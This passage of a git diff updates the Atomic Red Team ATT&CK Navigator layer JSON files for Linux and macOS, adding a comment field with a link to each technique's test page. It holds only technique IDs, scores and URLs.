ithub.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json index 0a502e83..09dc27c0 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.005","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1110.004","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/a